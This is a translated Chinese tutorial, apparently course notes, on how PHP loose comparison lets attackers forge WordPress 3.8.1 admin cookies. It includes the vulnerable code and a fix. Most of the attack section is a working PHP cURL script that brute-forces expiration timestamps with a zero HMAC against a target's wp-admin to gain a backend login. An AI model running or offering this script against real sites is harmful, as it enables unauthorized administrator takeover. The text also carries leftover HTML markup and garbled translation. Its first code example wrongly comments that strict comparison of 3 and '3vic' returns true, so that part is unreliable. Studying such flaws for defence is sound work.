PHP weak typing: WordPress cookie forgery

1 PHP is weakly typed

　 PHP is a weakly typed language, so variables will be automatically type converted due to different usage scenarios. Use == and in PHP! = When performing equality judgment, type conversion will be performed automatically. Use === and ! == The type will not be automatically converted when making judgments.

<span>1</span> <?<span>php
</span><span>2</span><span>$a</span> = 3<span>;
</span><span>3</span><span>$b</span> = '3vic'<span>;
</span><span>4</span><span>var_dump</span>(<span>$a</span> == <span>$b</span>);<span>//</span><span>true</span><span>5</span><span>var_dump</span>(<span>$a</span> != <span>$b</span>);<span>//</span><span>false</span><span>6</span><span>var_dump</span>(<span>$a</span> === <span>$b</span>);<span>//</span><span>true</span><span>7</span><span>var_dump</span>(<span>$a</span> !== <span>$b</span>);<span>//</span><span>false</span><span>8</span> ?>

　Note: When converting a string into an integer in PHP, if it starts with a number, it will be converted to the previous number ('3vic' -> 3). If it does not start with a number, it will be converted to 0 ('vic' -> 0)

2 WordPress code

• WordPress 3.8.1 and WordPress 3.8.2 Some code differences

<span>1</span> <?<span>php
</span><span>2</span><span>//</span><span> WordPress 3.8.1</span><span>3</span><span>if</span> (<span>$hmac</span> != <span>$hash</span><span>) {}
</span><span>4</span><span>//</span><span> WordPress 3.8.2</span><span>5</span><span>if</span> ( hash_hmac('md5', <span>$hmac</span>, <span>$key</span>) !== hash_hmac('md5', <span>$hash</span>, <span>$key</span><span>) )  {}
</span><span>6</span> ?>

• Cookie Composition

　The client background only verifies one of the cookies, as shown below

wordpress_c47f4a97d0321c1980bb76fc00d1e78f=admin|<span>1433403595</span>|cf50f3b50eed94dd0fdc3d3ea2c7bbb; path=/wp-admin; domain=www.test.ichunqiu; HttpOnly

　The cookie name

wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91 format is wordpress_ + m d5(siteurl) Where siteurl is the URL of WordPress. The website address here is http://www.test.ichunqiu<span>, and after </span>md5 encryption, it is c47f4a97d0321c1980bb76fc00d1e78f<span></span>. Other parts can also be omitted.

Type username expiration time The hash value assigned to the client by the server after successful login

Corresponding variable	$username	$expiration	$hmac
cookies	admin	1433403595	cf50f3b50eed94dd0fdc3d3ea2c7bbb

Analysis Verification Login

　Code

wp-includes/pluggable.php Lines 543-549

<span>1</span> <?<span>php
</span><span>2</span><span>$key</span> = wp_hash(<span>$username</span> . <span>$pass_frag</span> . '|' . <span>$expiration</span>, <span>$scheme</span><span>);
</span><span>3</span><span>$hash</span> = hash_hmac('md5', <span>$username</span> . '|' . <span>$expiration</span>, <span>$key</span><span>);
</span><span>4</span><span>if</span> ( <span>$hmac</span> != <span>$hash</span><span> ) {
</span><span>5</span>     do_action('auth_cookie_bad_hash', <span>$cookie_elements</span><span>);
</span><span>6</span><span>return</span><span>false</span><span>;
</span><span>7</span> }

　At the code location Among the variables used, the ones that can be controlled by changing the client cookie include

$username username, $expiration expiration date, and because the username is fixed, only $expiration is controllable , so we can change $hash<span></span> by changing $expiration .

Combined with PHP Hash
• Comparison defects Analysis of WordPress

There are several possibilities to make

$hmac == $hash true, the strings are completely equal or $hmac is equal to 0 at the same time $hash<span></span> is a string starting with a character; change the $hmac value in the client’s cookie to 0, and then write in the line above if ( $hmac != $hash ) { var_dump($hmac);die()<span>;</span>I found that the result of printing $hmac is string '0' instead of int 0, so is there a way to make the string To recognize it as an integer, the code is as follows:

<span>1</span> <?<span>php
</span><span>2</span><span>var_dump</span>('0' == '0e156464513131');<span>//</span><span>true</span>

　 Among them,

0e156464513131 will be recognized as 0 multiplied by 10 to the power of 156464513131, which is still 0; therefore, when $hash starts with 0e and is followed by all When it is a number, it will be equal to when the value of $hmac<span></span> is '0', so we can set the client's cookie to something like wordpress_c47f4a97d0321c1980bb76fc00d1e78f=admin|1433403595|0 and then continuously update the expiration time (now 1 433403595 position) to collide with the server side. Once the value of $hash starts with 0e and is followed by numbers, it can be verified and passed. Assuming that the collision is successful, modify the browser's cookie and directly access the backend address to successfully log in to the backend.

3 Test script

By changing the expiration time value in the client cookie, constantly trying to log in to the backend, and finding out the timestamp that can enter the backend, thereby realizing cookie forgery login backend.

<span> 1</span> <?<span>php
</span><span> 2</span><span>/*</span><span> 3</span><span> 4</span><span>本脚本用于WordPress 3.8.1 的cookie伪造漏洞检测
</span><span> 5</span><span>传入两个值
</span><span> 6</span><span>  WordPress 的主页 $host
</span><span> 7</span><span>  管理员用户名     $root
</span><span> 8</span><span>*/</span><span> 9</span><span>header</span>("Content-type:text/html;charset=utf-8"<span>);
</span><span>10</span><span>11</span><span>$host</span> = 'http://xxx.xxx.xxx';<span>//</span><span>主页地址 结尾不带'/'</span><span>12</span><span>$root</span> = 'user';<span>//</span><span>管理员用户名</span><span>13</span><span>14</span><span>$url</span> = <span>$host</span>.'/wp-admin/';<span>//</span><span>后台管理地址    </span><span>15</span><span>$sitehash</span>=<span>md5</span>(<span>$host</span><span>); 
</span><span>16</span><span>17</span><span>echo</span> "\nWelcome\n\n"<span>;
</span><span>18</span><span>//</span><span>通过时间戳暴力破解cookie 实现伪造cookie</span><span>19</span><span>for</span>(<span>$i</span>=1500000000;<span>$i</span><1600000000;<span>$i</span>++<span>){
</span><span>20</span><span>$cookie</span> = "wordpress_".<span>$sitehash</span>."=".<span>$root</span>."|".<span>$i</span>."|0;";<span>//</span><span>组合构造cookie</span><span>21</span><span>$header</span> = <span>array</span><span>(
</span><span>22</span>        "Content-Type:application/x-www-form-urlencoded",
<span>23</span>       'User-Agent: Mozilla/4.0 (compatible; MSIE .0; Windows NT 6.1; Trident/4.0; SLCC2;)',
<span>24</span>       "Cookie:".<span>$cookie</span>,
<span>25</span><span>      );
</span><span>26</span><span>27</span><span>$curl</span> = curl_init(); <span>//</span><span> 启动一个CURL会话    </span><span>28</span>         curl_setopt(<span>$curl</span>, CURLOPT_URL, <span>$url</span>); <span>//</span><span> 要访问的地址</span><span>29</span>         curl_setopt(<span>$curl</span>, CURLOPT_FOLLOWLOCATION, 1); <span>//</span><span> 使用自动跳转    </span><span>30</span>         curl_setopt(<span>$curl</span>, CURLOPT_AUTOREFERER, 1); <span>//</span><span> 自动设置Referer    </span><span>31</span>         curl_setopt(<span>$curl</span>, CURLOPT_HTTPGET, <span>true</span>); <span>//</span><span> 发送一个常规的Post请求    </span><span>32</span>         curl_setopt(<span>$curl</span>, CURLOPT_HTTPHEADER, <span>$header</span>); <span>//</span><span> 读取上面所储存的Cookie信息         </span><span>33</span>         curl_setopt(<span>$curl</span>, CURLOPT_RETURNTRANSFER, 1); <span>//</span><span> 获取的信息以文件流的形式返回 </span><span>34</span>         curl_setopt(<span>$curl</span>, CURLOPT_HEADER, <span>false</span><span>);
</span><span>35</span>         curl_setopt(<span>$curl</span>, CURLOPT_HEADER, 0<span>);   
</span><span>36</span>         curl_setopt(<span>$curl</span>, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);<span>//</span><span>让curl自动选择版本</span><span>37</span><span>$tmpInfo</span> = curl_exec(<span>$curl</span>); <span>//</span><span> 执行操作</span><span>38</span><span>if</span> (curl_errno(<span>$curl</span><span>)) {    
</span><span>39</span><span>echo</span> 'Errno'.curl_error(<span>$curl</span><span>);    
</span><span>40</span><span>        }    
</span><span>41</span>         curl_close(<span>$curl</span>); <span>//</span><span> 关闭CURL会话
</span><span>42</span><span>43</span><span>        //匹配结果</span><span>44</span><span>if</span>(<span>strstr</span>(<span>$tmpInfo</span>,'我们准备了几个链接供您开始'<span>)){
</span><span>45</span><span>echo</span>  "\n".'success : '.<span>$cookie</span>."\n\n"<span>;
</span><span>46</span><span>break</span><span>;
</span><span>47</span>         }<span>else</span><span>{
</span><span>48</span><span>echo</span>  'fail : '.<span>$cookie</span>."\n"<span>;
</span><span>49</span><span>        }
</span><span>50</span><span>51</span><span>    }
</span><span>52</span> ?>    

Explanation: Theoretically, the 32-bit MD5 value starting with 0e is about one in 300 million, and the chance of hitting an exploitable $expiration is extremely low .

5 Fix

　Hash comparison function used in PHP, change == , ! = changed to === and respectively! == Or use MD5 to encrypt the two compared variables again.

Study notes: http://ichunqiu.com/course/167

The above introduces the PHP weak type: WordPress cookie forgery, including the content. I hope it will be helpful to friends who are interested in PHP tutorials.